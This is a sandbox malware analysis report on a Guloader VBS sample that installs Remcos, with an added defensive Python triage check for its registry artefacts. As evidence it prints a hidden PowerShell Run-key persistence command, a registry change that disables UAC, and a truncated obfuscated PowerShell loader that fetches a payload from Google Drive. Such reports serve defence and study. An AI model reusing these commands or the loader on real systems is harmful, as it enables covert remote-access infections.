Malware Analysis Report

2025-06-16 03:44

Sample ID 240325-bymqysfc6s
Target 7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs
SHA256 7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e
Tags
guloader downloader persistence evasion trojan
score
10/10

Analysis Overview

score
10/10

SHA256

7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e

Threat Level: Known bad

The file 7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence evasion trojan

Guloader,Cloudeye

UAC bypass

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-25 01:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-25 01:33

Reported

2024-03-25 01:35

Platform

win7-20240221-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1008 set thread context of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
GB 172.217.169.78:443 drive.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 bb73ae965421adb39987483611b65dde
SHA1 0e938488972a3e233cb9529f612a47c92921e725
SHA256 56963d19c5498232698d63f748aa585fbcd502e477600de060ab1fe86dc7735c
SHA512 251b7b8eae9ac4a426f2701c01de2fa517252af39fd0ea632dc6ef7caebf514ed0c195ad8b93b78ab6e25840d04751b288648de6683e4841fe73cedefef0bf0c

memory/2280-275-0x000000001B8E0000-0x000000001BBC2000-memory.dmp

memory/2280-276-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2280-277-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

memory/2280-278-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-279-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

memory/2280-280-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-282-0x0000000002990000-0x00000000029B2000-memory.dmp

memory/2280-281-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-283-0x0000000002930000-0x0000000002942000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N0B18U0TWDLAZW3EG748.temp

MD5 503dce2c5147c859e82aea8d76eacdb1
SHA1 c13736860fe262c146e144fd4994f239dce5bbc4
SHA256 25b86b3ce5ab1d739fe5b31ad299df96726fd1a5cf332a3faec7d8178cbdc4a6
SHA512 46c38a9f888d09464f74b249f5bedcb28916894ce6e41ae3620c1654274cef13b19f1646f457832cd001214803836c40ab6534b723a86313c2ee920d9749ffce

memory/1008-286-0x0000000072FC0000-0x000000007356B000-memory.dmp

memory/1008-288-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1008-287-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1008-289-0x0000000072FC0000-0x000000007356B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d9fdce3a5f6b9359d020211ed4805dfd
SHA1 bb54b3fe183ac51ad00ffbbe00b40756e988d8fd
SHA256 c9cf135ac22fafa9fda4b285ebefba701a46de9b25c120497b5aa76cfcef0276
SHA512 a8a088f9acb8621b206a32739314dc009e691afc0ea55c612798ee3c38bb0c5f86247a0f45fb8364a13261ebd4178fc35c93263c7122ddb46a07514cf4c31cfd

C:\Users\Admin\AppData\Local\Temp\Cab28E4.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

memory/1008-301-0x0000000002910000-0x0000000002950000-memory.dmp

memory/2280-302-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

memory/2280-303-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-305-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-306-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-307-0x0000000002000000-0x0000000002080000-memory.dmp

memory/1008-304-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/1008-308-0x0000000005670000-0x0000000005671000-memory.dmp

memory/1008-309-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/1008-310-0x0000000072FC0000-0x000000007356B000-memory.dmp

memory/1008-311-0x0000000076F80000-0x0000000077129000-memory.dmp

memory/1008-312-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1008-313-0x0000000077170000-0x0000000077246000-memory.dmp

memory/2956-314-0x0000000001850000-0x0000000004B0B000-memory.dmp

memory/2956-315-0x0000000076F80000-0x0000000077129000-memory.dmp

memory/1008-317-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/2956-318-0x0000000077170000-0x0000000077246000-memory.dmp

memory/2956-319-0x00000000771A6000-0x00000000771A7000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f5278624a2edc2e5913baea62d183bbb
SHA1 8c4c30835e01b72ba1a5f4da0dc66609d4df8eb4
SHA256 f04f8bb041521d898295f4df0bfc0589e5d3907606a1be78347373b71f28dd16
SHA512 d214cc183e2189cfe37e21f06f13f1eda9259df734c3e0abbea08943715ae1bd0a33c9c5bef3bd0872c2613a0b2841c97dfbddad7e337ac15922a118024a91cd

C:\Users\Admin\AppData\Local\Temp\Tar92EE.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2956-340-0x00000000007E0000-0x0000000001842000-memory.dmp

memory/2956-343-0x0000000077170000-0x0000000077246000-memory.dmp

memory/2956-342-0x0000000001850000-0x0000000004B0B000-memory.dmp

memory/1008-345-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/2280-346-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-25 01:33

Reported

2024-03-25 01:35

Platform

win10v2004-20240319-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1096 set thread context of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\windows mail\wab.exe N/A
Key created \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000_Classes\Local Settings C:\ProgramData\Remcos\remcos.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1096 wrote to memory of 3424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 3424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 2152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3424 wrote to memory of 2152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3424 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 1096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1096 wrote to memory of 3440 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3440 wrote to memory of 908 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 908 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 908 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 908 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 908 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 908 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3440 wrote to memory of 1712 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1712 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1712 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3440 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3440 wrote to memory of 4696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 1712 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1712 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1712 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
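The WriteProcessMemory chain above ends with cmd.exe (PIDs 908 and 1712) spawning reg.exe (PIDs 4568 and 4644). Their command lines, recorded under Processes below, are the two persistence artefacts of this sample: a Run value named "Startup key" of type REG_EXPAND_SZ whose command starts with the unusual variable %Melaxuma%, runs with -w 1 (the numeric form of -WindowStyle Hidden) and fetches its script body from the registry value HKCU\Hooves\Handelsordreregistret with Get-ItemProperty; and HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA set to 0, which is the change behind the UAC bypass signature and disables UAC from the next reboot. The report does not show what %Melaxuma% expands to. The Python below is an added triage check, not part of the sandbox output: it parses the text that reg query prints for those two keys and flags this pattern. The sample output is constructed from the values on this page plus a benign OneDrive entry for contrast; the list of expected environment variables and the reason strings are assumptions of the example.

```python
"""Triage check for the persistence artefacts recorded in this report.

Added example, not part of the sandbox output: it looks for a Run value
that launches a script stored elsewhere in the registry and for EnableLUA
set to 0, using the text format that `reg query` prints.
"""
import re

# Variables that normally appear in Run entries (assumed list); anything
# else, such as the per-sample %Melaxuma% here, is worth a look.
KNOWN_ENV = {"WINDIR", "SYSTEMROOT", "SYSTEMDRIVE", "PROGRAMFILES",
             "PROGRAMFILES(X86)", "PROGRAMDATA", "APPDATA", "LOCALAPPDATA",
             "USERPROFILE", "PUBLIC", "TEMP", "TMP", "COMMONPROGRAMFILES"}

# Tokens that fetch a script body from the registry and run it.
REG_LOADER = re.compile(
    r"Get-ItemProperty|Invoke-Expression|\biex\b|HK(?:CU|LM):", re.I)
# powershell -w 1 is -WindowStyle Hidden spelled as its enum value.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)

# reg query prints one key per unindented line and values beneath it as
# "    <name>    <type>    <data>" (four-space separators).
VALUE_LINE = re.compile(
    r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+) {4}(?P<data>.*)$")

# Constructed sample: the two values from this report plus a benign entry.
SAMPLE_REG_QUERY = (
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n"
    "    OneDrive    REG_SZ    \"C:\\Users\\Admin\\AppData\\Local\\Microsoft"
    "\\OneDrive\\OneDrive.exe\" /background\n"
    "    Startup key    REG_EXPAND_SZ    %Melaxuma% -w 1 $Ladys=(Get-ItemProperty"
    " -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)\n"
    "\n"
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
    "\\Policies\\System\n"
    "    EnableLUA    REG_DWORD    0x0\n"
)


def parse_reg_query(text: str) -> list:
    """Turn reg query output into (key, name, type, data) tuples."""
    key, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            key = line.strip()          # unindented line: a new key path
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            rows.append((key, m["name"], m["type"], m["data"]))
    return rows


def triage(rows: list) -> list:
    """Return (value name, [reasons]) for every row that matches the pattern."""
    findings = []
    for key, name, vtype, data in rows:
        reasons = []
        upper_key = key.upper()
        if upper_key.endswith("\\CURRENTVERSION\\RUN"):
            # %VAR% references that are not the usual system/user locations.
            for var in sorted(set(re.findall(r"%([^%]+)%", data))):
                if var.upper() not in KNOWN_ENV:
                    reasons.append(
                        f"launched through unrecognised variable %{var}%")
            if REG_LOADER.search(data):
                reasons.append("script body is read from the registry")
            if HIDDEN_WINDOW.search(data):
                reasons.append("runs with a hidden window (-w 1)")
        elif upper_key.endswith("\\POLICIES\\SYSTEM") and name.upper() == "ENABLELUA":
            if int(data, 16) == 0:      # reg query prints DWORDs as 0x...
                reasons.append("UAC disabled (EnableLUA=0)")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for value_name, why in triage(parse_reg_query(SAMPLE_REG_QUERY)):
        print(value_name)
        for reason in why:
            print("  -", reason)
```

On a live host, feed it the output of reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run and reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA; a clean machine reports EnableLUA as 0x1, and a Run value that expands a variable nobody recognises deserves a look at the variable's definition as well as at the registry value it points to.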

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota 
